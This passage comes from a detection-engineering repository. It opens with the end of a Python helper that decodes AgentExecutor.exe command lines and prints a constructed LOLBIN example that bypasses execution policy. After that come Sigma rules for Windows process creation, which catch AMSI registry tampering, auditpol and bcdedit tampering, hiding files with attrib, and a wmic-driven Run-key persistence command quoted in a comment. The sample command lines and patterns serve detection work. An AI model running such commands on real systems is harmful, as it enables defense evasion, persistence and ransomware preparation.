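    """Mirror of the 'Suspicious AgentExecutor PowerShell Execution' rule for the
    -powershell form: fires unless the PowerShell directory is one of the two
    Windows ones or the parent is the Intune management extension agent."""
    info = decode_agentexecutor(cmdline)
    if info is None or parent_image.lower().endswith(INTUNE_AGENT):
        return False
    return info["pwsh_outside_windows_dirs"]


# Constructed command lines; the staging directory is invented for the example.
IME = "C:\\Windows\\IMECache\\HealthScripts\\a1b2"
INTUNE_LINE = (f'AgentExecutor.exe -powershell "{IME}\\detect.ps1" "{IME}\\detect.out" '
               f'"{IME}\\detect.err" "{IME}\\detect.timeout" 60000 '
               '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" 0 1')
SIGNED_LINE = INTUNE_LINE[:-3] + "1 1"   # same line with enforceSignatureCheck = 1
LOLBIN_LINE = ('AgentExecutor.exe -powershell C:\\Users\\Public\\run.ps1 C:\\Users\\Public\\o.txt '
               'C:\\Users\\Public\\e.txt C:\\Users\\Public\\t.txt "" C:\\Users\\Public\\ 0')

if __name__ == "__main__":
    for line in (INTUNE_LINE, SIGNED_LINE, LOLBIN_LINE):
        print(decode_agentexecutor(line))
    print(suspicious_agentexecutor(LOLBIN_LINE, "C:\\Users\\bob\\stage.exe"))
```

The LOLBIN line is the case both rules describe: an empty fifth argument falls back to the 60000 timeout, the sixth argument makes the tool run `C:\Users\Public\powershell.exe`, and a "0" for enforceSignatureCheck yields `-executionPolicy bypass`. It is suppressed only when the parent is the Intune agent, which is why the first rule keeps the Intune parent filter but not the path filter.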
  {
    "path": "rules/windows/process_creation/proc_creation_win_amsi_registry_tampering.yml",
    "content": "title: Windows AMSI Related Registry Tampering Via CommandLine\nid: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981\nrelated:\n    - id: aa37cbb0-da36-42cb-a90f-fdf216fc7467 # AMSI Disabled via Registry Modification\n      type: similar\nstatus: experimental\ndescription: |\n    Detects tampering of AMSI (Anti-Malware Scan Interface) related registry values via command line tools such as reg.exe or PowerShell.\n    AMSI provides a generic interface for applications and services to integrate with antimalware products.\n    Adversaries may disable AMSI to evade detection of malicious scripts and code execution.\nreferences:\n    - https://github.com/arttoolkit/arttoolkit.github.io/blob/16d6230d009e58fd6f773f5317fd4d14c1f26004/_wadcoms/AMSI-Bypass-Jscript_amsienable.md\n    - https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d\n    - https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1562.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_key:\n        CommandLine|contains|all:\n            - '\\Software\\Microsoft\\Windows Script\\Settings'\n            - 'AmsiEnable'\n    selection_reg_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_cmd:\n        CommandLine|contains: 'add'\n    selection_powershell_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_powershell_cmd:\n        CommandLine|contains:\n            - 'Set-ItemProperty'\n            - 'New-ItemProperty'\n            - 'sp '\n    condition: selection_key and (all of selection_powershell_* or all of selection_reg_*)\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: AMSI Bypass - Create AMSIEnable Reg Key\n      technique: T1562.001\n      atomic_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Of Appvlp.EXE\nid: 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43\nstatus: test\ndescription: |\n    Detects uncommon child processes of Appvlp.EXE\n    Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse \"AppVLP\" to execute shell commands.\n    Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder\n    or to mark a file as a system file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\nauthor: Sreeman\ndate: 2020-03-13\nmodified: 2023-11-09\ntags:\n    - attack.t1218\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\appvlp.exe'\n    # Note: Filters based on data from EchoTrail: https://www.echotrail.io/insights/search/appvlp.exe/\n    filter_main_generic:\n        Image|endswith:\n            - ':\\Windows\\SysWOW64\\rundll32.exe'\n            - ':\\Windows\\System32\\rundll32.exe'\n    filter_optional_office_msoasb:\n        Image|contains: ':\\Program Files\\Microsoft Office'\n        Image|endswith: '\\msoasb.exe'\n    filter_optional_office_skype:\n        Image|contains|all:\n            - ':\\Program Files\\Microsoft Office'\n            - '\\SkypeSrv\\'\n        Image|endswith: '\\SKYPESERVER.EXE'\n    filter_optional_office_msouc:\n        Image|contains: ':\\Program Files\\Microsoft Office'\n        Image|endswith: '\\MSOUC.EXE'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_arcsoc_susp_child_process.yml",
    "content": "title: Suspicious ArcSOC.exe Child Process\nid: 8e95e73e-ba02-4a87-b4d7-0929b8053038\nstatus: experimental\ndescription: |\n    Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe.\n    ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromises an ArcGIS\n    Server system and uploads a malicious Server Object Extension (SOE), they can send crafted requests to the corresponding\n    service endpoint and remotely execute code from the ArcSOC.exe process.\nreferences:\n    - https://reliaquest.com/blog/threat-spotlight-inside-flax-typhoons-arcgis-compromise/\n    - https://enterprise.arcgis.com/en/server/12.0/administer/windows/inside-an-arcgis-server-site.htm\nauthor: Micah Babinski\ndate: 2025-11-25\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.t1203\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\ArcSOC.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    filter_main_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine: 'cmd.exe /c \"ver\"'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml",
    "content": "title: AspNetCompiler Execution\nid: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec\nrelated:\n    - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild\n      type: similar\n    - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File\n      type: similar\n    - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths\n      type: similar\nstatus: test\ndescription: Detects execution of \"aspnet_compiler.exe\" which can be abused to compile and execute C# code.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/\n    - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/\nauthor: frack113\ndate: 2021-11-24\nmodified: 2025-02-24\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n        Image|endswith: '\\aspnet_compiler.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml",
    "content": "title: Suspicious Child Process of AspNetCompiler\nid: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild\nrelated:\n    - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File\n      type: similar\n    - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths\n      type: similar\n    - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec\n      type: similar\nstatus: test\ndescription: Detects potentially suspicious child processes of \"aspnet_compiler.exe\".\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/\n    - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-14\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\aspnet_compiler.exe'\n    selection_child:\n        # Note: add other potential suspicious child processes and paths\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\notepad.exe'\n        - Image|contains:\n              - '\\Users\\Public\\'\n              - '\\AppData\\Local\\Temp\\'\n              - '\\AppData\\Local\\Roaming\\'\n              - ':\\Temp\\'\n              - ':\\Windows\\Temp\\'\n              - ':\\Windows\\System32\\Tasks\\'\n              - ':\\Windows\\Tasks\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml",
    "content": "title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler\nid: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths\nrelated:\n    - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild\n      type: similar\n    - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File\n      type: similar\n    - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec\n      type: similar\nstatus: test\ndescription: Detects execution of \"aspnet_compiler.exe\" with potentially suspicious paths for compilation.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/\n    - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-14\nmodified: 2025-02-24\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n        Image|endswith: '\\aspnet_compiler.exe'\n        CommandLine|contains:\n            # Note: add other potential suspicious paths\n            - '\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Local\\Roaming\\'\n            - ':\\Temp\\'\n            - ':\\Windows\\Temp\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml",
    "content": "title: Interactive AT Job\nid: 60fc936d-2eb0-4543-8a13-911c750a1dfc\nstatus: test\ndescription: Detects an interactive AT job, which may be used as a form of privilege escalation.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1053.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\at.exe'\n        CommandLine|contains: 'interactive'\n    condition: selection\nfalsepositives:\n    - Unlikely (at.exe deprecated as of Windows 8)\nlevel: high\nsimulation:\n    - type: atomic-red-team\n      name: At.exe Scheduled task\n      technique: T1053.002\n      atomic_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_atbroker_uncommon_ats_execution.yml",
    "content": "title: Uncommon  Assistive Technology Applications Execution Via AtBroker.EXE\nid: f24bcaea-0cd1-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects the start of a non built-in assistive technology applications via \"Atbroker.EXE\".\nreferences:\n    - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/\n    - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/\nauthor: Mateusz Wydra, oscd.community\ndate: 2020-10-12\nmodified: 2024-03-06\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\AtBroker.exe'\n        - OriginalFileName: 'AtBroker.exe'\n    selection_cli:\n        CommandLine|contains: 'start'\n    filter_main_builtin:\n        CommandLine|contains:\n            - 'animations'\n            - 'audiodescription'\n            - 'caretbrowsing'\n            - 'caretwidth'\n            - 'colorfiltering'\n            - 'cursorindicator'\n            - 'cursorscheme'\n            - 'filterkeys'\n            - 'focusborderheight'\n            - 'focusborderwidth'\n            - 'highcontrast'\n            - 'keyboardcues'\n            - 'keyboardpref'\n            - 'livecaptions'\n            - 'magnifierpane'\n            - 'messageduration'\n            - 'minimumhitradius'\n            - 'mousekeys'\n            - 'Narrator'\n            - 'osk'\n            - 'overlappedcontent'\n            - 'showsounds'\n            - 'soundsentry'\n            - 'speechreco'\n            - 'stickykeys'\n            - 'togglekeys'\n            - 'voiceaccess'\n            - 'windowarranging'\n            - 'windowtracking'\n            - 'windowtrackingtimeout'\n            - 'windowtrackingzorder'\n    filter_optional_java:\n        CommandLine|contains: 'Oracle_JavaAccessBridge'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n 
   - Legitimate, non-default assistive technology applications execution\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml",
    "content": "title: Hiding Files with Attrib.exe\nid: 4281cb20-2994-4580-aa63-c8b86d019934\nstatus: test\ndescription: Detects usage of attrib.exe to hide files from users.\nreferences:\n    - https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\n    - https://www.uptycs.com/blog/lolbins-are-no-laughing-matter\nauthor: Sami Ruohonen\ndate: 2019-01-16\nmodified: 2023-03-14\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\attrib.exe'\n        - OriginalFileName: 'ATTRIB.EXE'\n    selection_cli:\n        CommandLine|contains: ' +h '\n    filter_main_msiexec:\n        CommandLine|contains: '\\desktop.ini '\n    filter_optional_intel:\n        ParentImage|endswith: '\\cmd.exe'\n        CommandLine: '+R +H +S +A \\\\\\*.cui'\n        ParentCommandLine: 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)\n    - Msiexec.exe hiding desktop.ini\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml",
    "content": "title: Set Suspicious Files as System Files Using Attrib.EXE\nid: efec536f-72e8-4656-8960-5e85d091345b\nrelated:\n    - id: bb19e94c-59ae-4c15-8c12-c563d23fe52b\n      type: derived\nstatus: test\ndescription: |\n    Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\nreferences:\n    - https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4\n    - https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0\n    - https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2023-03-14\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\attrib.exe'\n        - OriginalFileName: 'ATTRIB.EXE'\n    selection_cli:\n        CommandLine|contains: ' +s'\n    selection_paths:\n        CommandLine|contains:\n            - ' %' # Custom Environment variable\n            - '\\Users\\Public\\'\n            - '\\AppData\\Local\\'\n            - '\\ProgramData\\'\n            - '\\Downloads\\'\n            - '\\Windows\\Temp\\'\n    selection_ext:\n        CommandLine|contains:\n            - '.bat'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n    filter_optional_installer:\n        CommandLine|contains|all:\n            - '\\Windows\\TEMP\\'\n            - '.exe'\n    condition: all of selection* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml",
    "content": "title: Audit Policy Tampering Via NT Resource Kit Auditpol\nid: c6c56ada-612b-42d1-9a29-adad3c5c2c1e\nrelated:\n    - id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version\n      type: similar\nstatus: test\ndescription: |\n    Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\n    This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\nreferences:\n    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-18\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '/logon:none'\n            - '/system:none'\n            - '/sam:none'\n            - '/privilege:none'\n            - '/object:none'\n            - '/process:none'\n            - '/policy:none'\n    condition: selection\nfalsepositives:\n    - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_auditpol_susp_execution.yml",
    "content": "title: Audit Policy Tampering Via Auditpol\nid: 0a13e132-651d-11eb-ae93-0242ac130002\nrelated:\n    - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e # Old auditpol\n      type: similar\nstatus: test\ndescription: |\n  Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\n  This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\nreferences:\n    - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\nauthor: Janantha Marasinghe (https://github.com/blueteam0ps)\ndate: 2021-02-02\nmodified: 2023-02-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\auditpol.exe'\n        - OriginalFileName: 'AUDITPOL.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - 'disable' # disables a specific audit policy\n            - 'clear'   # delete or clears audit policy\n            - 'remove'  # removes an audit policy\n            - 'restore' # restores an audit policy\n    condition: all of selection_*\nfalsepositives:\n    - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_autorun_registry_modified_via_wmic.yml",
    "content": "title: Suspicious Autorun Registry Modified via WMI\nid: c80e66d8-1780-48a9-b412-46663fd21ac0\nstatus: experimental\ndescription: |\n    Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.\nreferences:\n    - Internal Research\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1547.001\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_execution_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe' # wmic process call create 'reg.exe add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Desktops /t REG_SZ /d \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\tre\\Desktops.exe\\\" random\" /f'\n        - ParentImage|endswith: '\\wmiprvse.exe'\n    selection_execution_cmd:\n        CommandLine|contains|all:\n            - 'reg'\n            - ' add '\n        CommandLine|contains:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n    selection_suspicious_paths_1:\n        CommandLine|contains:\n            - ':\\Perflogs'\n            - :\\ProgramData'\n            - ':\\Windows\\Temp'\n            - ':\\Temp'\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming'\n            - ':\\$Recycle.bin'\n            - ':\\Users\\Default'\n            - ':\\Users\\public'\n            - 
'%temp%'\n            - '%tmp%'\n            - '%Public%'\n            - '%AppData%'\n    selection_suspicious_paths_user_1:\n        CommandLine|contains: ':\\Users\\'\n    selection_suspicious_paths_user_2:\n        CommandLine|contains:\n            - '\\Favorites'\n            - '\\Favourites'\n            - '\\Contacts'\n            - '\\Music'\n            - '\\Pictures'\n            - '\\Documents'\n            - '\\Photos'\n    condition: all of selection_execution_* and (selection_suspicious_paths_1 or (all of selection_suspicious_paths_user_*))\nfalsepositives:\n    - Legitimate administrative activity or software installations\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_baaupdate_susp_child_process.yml",
    "content": "title: Suspicious BitLocker Access Agent Update Utility Execution\nid: 9f38c1db-e2ae-40bf-81d0-5b68f73fb512\nrelated:\n    - id: 6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984 # BaaUpdate.exe Suspicious DLL Load\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes.\n    Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.\nreferences:\n    - https://github.com/rtecCyberSec/BitlockMove\nauthor: andrewdanis, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-18\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\baaupdate.exe'\n        Image|endswith:\n            - '\\bitsadmin.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bash_command_execution.yml",
    "content": "title: Indirect Inline Command Execution Via Bash.EXE\nid: 5edc2273-c26f-406c-83f3-f4d948e740dd\nrelated:\n    - id: 2d22a514-e024-4428-9dba-41505bd63a5b\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of Microsoft bash launcher with the \"-c\" flag.\n    This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Bash/\nauthor: frack113\ndate: 2021-11-24\nmodified: 2023-08-15\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - ':\\Windows\\System32\\bash.exe'\n              - ':\\Windows\\SysWOW64\\bash.exe'\n        - OriginalFileName: 'Bash.exe'\n    selection_cli:\n        CommandLine|contains: ' -c '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bash_file_execution.yml",
    "content": "title: Indirect Command Execution From Script File Via Bash.EXE\nid: 2d22a514-e024-4428-9dba-41505bd63a5b\nrelated:\n    - id: 5edc2273-c26f-406c-83f3-f4d948e740dd\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.\n    This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Bash/\n    - https://linux.die.net/man/1/bash\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-15\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - ':\\Windows\\System32\\bash.exe'\n              - ':\\Windows\\SysWOW64\\bash.exe'\n        - OriginalFileName: 'Bash.exe'\n    filter_main_cli_flag:\n        CommandLine|contains:\n            # Note: we're not interested in flags being passed first\n            - 'bash.exe -'\n            - 'bash -'\n    filter_main_no_cli:\n        CommandLine: null\n    filter_main_empty:\n        CommandLine: ''\n    filter_main_no_flag:\n        CommandLine:\n            - 'bash.exe'\n            - 'bash'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml",
    "content": "title: Boot Configuration Tampering Via Bcdedit.EXE\nid: 1444443e-6757-43e4-9ea4-c8fc705f79a2\nstatus: stable\ndescription: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2023-02-15\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bcdedit.exe'\n        - OriginalFileName: 'bcdedit.exe'\n    selection_set:\n        CommandLine|contains: 'set'\n    selection_cli:\n        - CommandLine|contains|all:\n              - 'bootstatuspolicy'\n              - 'ignoreallfailures'\n        - CommandLine|contains|all:\n              - 'recoveryenabled'\n              - 'no'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\nsimulation:\n    - type: atomic-red-team\n      name: Windows - Disable Windows Recovery Console Repair\n      technique: T1490\n      atomic_guid: cf21060a-80b3-4238-a595-22525de4ab81\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bcdedit_susp_execution.yml",
    "content": "title: Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE\nid: c9fbe8e9-119d-40a6-9b59-dd58a5d84429\nstatus: test\ndescription: Detects potential malicious and unauthorized usage of bcdedit.exe\nreferences:\n    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set\n    - https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2\nauthor: '@neu5ron'\ndate: 2019-02-07\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.persistence\n    - attack.t1542.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bcdedit.exe'\n        - OriginalFileName: 'bcdedit.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'delete'\n            - 'deletevalue'\n            - 'import'\n            - 'safeboot'\n            - 'network'\n    condition: all of selection_*\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bcp_export_data.yml",
